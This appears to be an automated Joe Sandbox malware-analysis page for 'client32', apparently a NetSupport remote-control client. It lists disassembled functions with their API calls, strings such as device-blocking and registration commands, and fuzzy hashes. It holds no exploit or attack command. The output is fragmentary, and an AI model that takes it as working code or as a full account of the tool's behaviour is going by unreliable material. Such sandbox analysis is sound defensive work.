Instruction ID: 894e21e3321225be45fbf4b84cce46d9dcc057afdefe44a7cc44894c2f8d1d99
Opcode Fuzzy Hash: df56dbca2d5c7331c01273a47a7a69ca0b246c7bc76a6fcbc4a787e55cec9ec9
Instruction Fuzzy Hash: 7241A275B40715AFD321DBA4CC86FCAF3A5AB48B08F108559F65A6B2C1DAB0B980CF54

Function 110039D0 Relevance: 19.7, APIs: 13, Instructions: 168COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000004), ref: 11003A14

Part of subcall function 111319C0: SetBkColor.GDI32(?,00000000), ref: 111319D4
Part of subcall function 111319C0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111319E9
Part of subcall function 111319C0: SetBkColor.GDI32(?,00000000), ref: 111319F1

InflateRect.USER32(?,000000FF,000000FF), ref: 11003A2F
GetSysColor.USER32(00000010), ref: 11003A42
GetSysColor.USER32(00000010), ref: 11003A59
GetSysColor.USER32(00000014), ref: 11003A70
GetSysColor.USER32(00000014), ref: 11003A87
GetSysColor.USER32(00000014), ref: 11003AA4
GetSysColor.USER32(00000014), ref: 11003ABB
GetSysColor.USER32(00000010), ref: 11003AD2
GetSysColor.USER32(00000010), ref: 11003AE9
GetSysColor.USER32(00000004), ref: 11003B00
SetBkColor.GDI32(?,00000000), ref: 11003B07
InflateRect.USER32(?,000000FE,000000FD), ref: 11003B15

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$InflateRect$Text
String ID:
API String ID: 657964945-0
Opcode ID: 75a281944239fc9cc8255bd8691d9929ae9360573710df36e32b81de45f5d6f4
Instruction ID: 27a68805ebcdaee86c9eebe4f484ff3a43488f1eb37c36fe33b719219f7d6558
Opcode Fuzzy Hash: 75a281944239fc9cc8255bd8691d9929ae9360573710df36e32b81de45f5d6f4
Instruction Fuzzy Hash: 6A5172B5A00649AFD714DFA4CC81FBFF3B8EF98315F104A18EA15A72C5D671B9018BA1

Function 110392A0 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 352COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11039767

Strings

@, xrefs: 110394D9
StudentRegister, xrefs: 11039591
DoRegisterUser, xrefs: 110392D3
Error. Failed to get username for Register, e=%d, xrefs: 110396C1
P, xrefs: 110396A6
Info. No logged on user for Register, xrefs: 11039673
Login name %s, xrefs: 11039702

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: @$DoRegisterUser$Error. Failed to get username for Register, e=%d$Info. No logged on user for Register$Login name %s$P$StudentRegister
API String ID: 2102423945-4086722448
Opcode ID: 22cbb9fb42798ebb7b2fd9b95911f0edbea0f32f4c9fa59db5531e7c095c1564
Instruction ID: 1d57743a9d44351fe37c7a7ceb1e13dab01037a573cd7346b174f6f956a17580
Opcode Fuzzy Hash: 22cbb9fb42798ebb7b2fd9b95911f0edbea0f32f4c9fa59db5531e7c095c1564
Instruction Fuzzy Hash: 2EE19D759106169FDBA1DF64CC84BDEB7B8AF85308F0085ADE51E97281EB70AE84CF50

Function 1100D200 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1100D271

Strings

Unknown error %d, xrefs: 1100D267
NoCapClients, xrefs: 1100D243
CannotLoadDll, xrefs: 1100D220
BadParam, xrefs: 1100D251
AlreadyStopped, xrefs: 1100D23C
NotFound, xrefs: 1100D24A
AlreadyStarted, xrefs: 1100D235
DllInitFailed, xrefs: 1100D227
CannotGetFunc, xrefs: 1100D22E
RequiresVista, xrefs: 1100D219
StillInstances, xrefs: 1100D25F
Exception, xrefs: 1100D258, 1100D266

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
API String ID: 2111968516-2092292787
Opcode ID: a62445a2f5b24e74ad1493caf88a761d0d6eb04853175cd6ce44690ba5ae0496
Instruction ID: d579ba34fa4a490cdb183746ff6a6ffdefa25787e89df8885af00e6879baa994
Opcode Fuzzy Hash: a62445a2f5b24e74ad1493caf88a761d0d6eb04853175cd6ce44690ba5ae0496
Instruction Fuzzy Hash: 4AF06C32AA821857AD0086EDB44443CF38C678066D7CCD1D2F58CEAF21E912CDA0AA99

Function 1101D0B0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 217timeCOMMON

Download Yara Rule

APIs

EnableWindow.USER32(00000000,?), ref: 1101D10E
InvalidateRect.USER32(00000000,00000000,00000000), ref: 1101D148
DeleteObject.GDI32(?), ref: 1101D193
SetTimer.USER32(00000000,00000001,000002EE,00000000), ref: 1101D28C
SetWindowTextA.USER32(00000000,00000000), ref: 1101D255

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1101D0F7, 1101D128, 1101D23E, 1101D26E, 1101D2E7, 1101D381
m_hWnd, xrefs: 1101D0FC, 1101D12D, 1101D243, 1101D273, 1101D2EC, 1101D386

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$DeleteEnableErrorExitInvalidateLastMessageObjectProcessRectTextTimerwsprintf
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 2329730260-1557312927
Opcode ID: 495e5cdad597b9cdb94b14c15a770d57a151504633e1c97aa44e3dbf2d83e9b8
Instruction ID: c8a0ada2fc9048c31c9f756b7ea63b130b06c90983f76905bbf0c43349d37983
Opcode Fuzzy Hash: 495e5cdad597b9cdb94b14c15a770d57a151504633e1c97aa44e3dbf2d83e9b8
Instruction Fuzzy Hash: D8915BB9A00601AFD315DB55CC94FD6F3F6BF98318F1086A8EA5A4B285D770F881CB91

Function 1103B350 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 146COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1103B396
_memmove.LIBCMT ref: 1103B3A3

Strings

SETUSBMASSSTORAGEACCESS, xrefs: 1103B3B3
BLOCKPRINTING, xrefs: 1103B40D
SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103B3D6
RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103B432
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 1103B44F
SETOPTICALDRIVEACCESS, xrefs: 1103B3E4
BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103B42B
SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103B3FF
IsA(), xrefs: 1103B454

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _malloc_memmove
String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
API String ID: 1183979061-2531374130
Opcode ID: f25e9cf5c57d6390efcc7966041a1c26c4ae1804cf4e710700545d1f65a68ee7
Instruction ID: df2692623f623c820235428dac45199c8cf8223a54f9d11746ef9c8afc1f3fc0
Opcode Fuzzy Hash: f25e9cf5c57d6390efcc7966041a1c26c4ae1804cf4e710700545d1f65a68ee7
Instruction Fuzzy Hash: E241A17AA00616AFCB01CF64DC90FDEB7F9EF45219F048569E855A7241EB35F908CBA0

Function 110593D0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 130windowregistryCOMMON

Download Yara Rule

APIs

RegisterClassA.USER32(111D925C), ref: 11059432

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

CreateWindowExA.USER32(00000000,NSMCobrProxy,11182200,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 11059473
SetPropA.USER32(?,NSMCobrProxy,00000000), ref: 110594FD
GetMessageA.USER32(00000000,?,00000000,00000000), ref: 11059520
TranslateMessage.USER32(?), ref: 11059536
DispatchMessageA.USER32(?), ref: 1105953C

Strings

m_hAppWin, xrefs: 1105948A
NSMCobrProxy, xrefs: 11059428, 1105946C, 110594F7
CobrowseProxy.cpp, xrefs: 11059444, 11059485
_bOK, xrefs: 11059449
CobrowseProxy::RunCobrowse, xrefs: 110593FA

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
API String ID: 13347155-1383313024
Opcode ID: 0e78c6e4fd56c04fe32ffe47ec9c10ecf785ae34a99339cc59077458bec90890
Instruction ID: 5c93ab26ba0373098ed229eca1638e6ca81362b407f281ecacd63ac87fa716a6
Opcode Fuzzy Hash: 0e78c6e4fd56c04fe32ffe47ec9c10ecf785ae34a99339cc59077458bec90890
Instruction Fuzzy Hash: C0419076E00746AFDB51DF65CC84F9AFBF5AB44718F408569F91697280FB70A800CBA1

Function 110E59D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PCIImage.dll,?,?,?,?,?,11002421,?,00000000,?,?,?,2F623E72), ref: 110E59E0
GetProcAddress.KERNEL32(00000000,CompressBitmapToJPEG), ref: 110E59F8
GetProcAddress.KERNEL32(00000000,CompressBitmapToPNG), ref: 110E5A02
FreeLibrary.KERNEL32(00000000), ref: 110E5A31

Strings

CompressBitmapToPNG, xrefs: 110E59FA
CompressBitmapToJPEG, xrefs: 110E59F2
PCIImage.dll, xrefs: 110E59D7

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: CompressBitmapToJPEG$CompressBitmapToPNG$PCIImage.dll
API String ID: 2256533930-3959649894
Opcode ID: fa0c913a2aa53d3e99a36a7a9d2ad049ba52169ed04aa04326fe7b94fadc73c9
Instruction ID: 271750b23f90fe7880e5a0594cd3e64ece953bea2f1261d1d737eee4330e7fb5
Opcode Fuzzy Hash: fa0c913a2aa53d3e99a36a7a9d2ad049ba52169ed04aa04326fe7b94fadc73c9
Instruction Fuzzy Hash: 1721797BB01118AFC700DB9AECC49DEF7A8EBC5266B148166FD1DD3200D63299008BA1

Function 111152F0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

GetVersionExA.KERNEL32(?,View,*NoHideFEP,00000000,00000000), ref: 1111534F
InterlockedExchange.KERNEL32(111DC144,00000001), ref: 11115375
CreateWindowExA.USER32(00000000,button,11182200,50000000,FFFFEC78,00000000,00000014,0000000E,?,00000001,00000000,00000000), ref: 111153BB
SetWindowLongA.USER32(00000000,000000FC,11115270), ref: 111153DB
SetFocus.USER32(00000000), ref: 111153F2
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 1111540C
DestroyWindow.USER32(00000000), ref: 11115422
InterlockedExchange.KERNEL32(111DC144,00000000), ref: 11115439

Strings

*NoHideFEP, xrefs: 1111531B
button, xrefs: 111153B5
View, xrefs: 11115320

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ExchangeInterlockedLong$CreateDestroyFocusVersion__wcstoi64
String ID: *NoHideFEP$View$button
API String ID: 1610953178-1502386645
Opcode ID: 4a4f39a3776c091e559f97f305575d72accde8dafeae70cae36c9c0c9739092f
Instruction ID: 2d5a82bd362b7f12f42ba8e56494d73917878a288bb9a975525e5583549efdad
Opcode Fuzzy Hash: 4a4f39a3776c091e559f97f305575d72accde8dafeae70cae36c9c0c9739092f
Instruction Fuzzy Hash: 4E31A470609372EFEB908B76CDC9B5AF7A8AB06309F54453DF825D6189E7B0A440CB11

Function 1100D550 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80processCOMMON

Download Yara Rule

APIs

Part of subcall function 110E2E50: LocalAlloc.KERNEL32(00000040,00000014,?,1100D56F,?), ref: 110E2E60
Part of subcall function 110E2E50: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D56F,?), ref: 110E2E72
Part of subcall function 110E2E50: SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,1100D56F,?), ref: 110E2E84

CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D587
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D5A0
_strrchr.LIBCMT ref: 1100D5AF
GetCurrentProcessId.KERNEL32 ref: 1100D5BF
wsprintfA.USER32 ref: 1100D5E0
_memset.LIBCMT ref: 1100D5F1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D629
CloseHandle.KERNEL32(?,00000000), ref: 1100D641
CloseHandle.KERNEL32(?), ref: 1100D64A

Strings

%sNSSilence.exe %u %u, xrefs: 1100D5DA
D, xrefs: 1100D61F

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
String ID: %sNSSilence.exe %u %u$D
API String ID: 1760462761-4146734959
Opcode ID: 38d3bc3da6cb395c9be1672e1e0789f0a082fd9a3163fbf41da1431788ce246e
Instruction ID: 4a2b6ea11212545f69c7d64acb08f887aa5157aeffa75dc865ae6a9c63889310
Opcode Fuzzy Hash: 38d3bc3da6cb395c9be1672e1e0789f0a082fd9a3163fbf41da1431788ce246e
Instruction Fuzzy Hash: 88219776E51324AFEB50DBA0CC89FDEB77C9B09708F108095F619A71C0DAB0AA44CF65

Function 11133150 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 79libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 11133176
GetProcAddress.KERNEL32(00000000), ref: 1113317D
GetCurrentProcessId.KERNEL32(00000000), ref: 11133193
GetCurrentProcessId.KERNEL32 ref: 111331B1
OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 111331BB
OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 111331CE
GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),111D6428,00000004,?), ref: 111331ED
CloseHandle.KERNEL32(00000000), ref: 11133214
CloseHandle.KERNEL32(00000000), ref: 1113321B

Strings

ProcessIdToSessionId, xrefs: 11133165
kernel32.dll, xrefs: 1113316A

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Process$Handle$CloseCurrentOpenToken$AddressInformationModuleProc
String ID: ProcessIdToSessionId$kernel32.dll
API String ID: 2536908267-3889420803
Opcode ID: f05b8fede040130ca69cc7ab618329d48fe069b5163e5afb1fda5806a126863c
Instruction ID: e6be192edd1e3b76cf1fdabe392791c1d0a960b91715f14bd5d837152ad25321
Opcode Fuzzy Hash: f05b8fede040130ca69cc7ab618329d48fe069b5163e5afb1fda5806a126863c
Instruction Fuzzy Hash: CF21C836A14214AFEB019BA58D88F9EFFBCDB88766F104155FD10D3248D730D505CB64

Function 11085070 Relevance: 18.1, APIs: 12, Instructions: 149COMMON

Download Yara Rule

APIs

IsValidSid.ADVAPI32(00000000,00000000,00000000,00000000,11085320,00000000,?,?,000F037F,00000000,00000000), ref: 110850AD

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
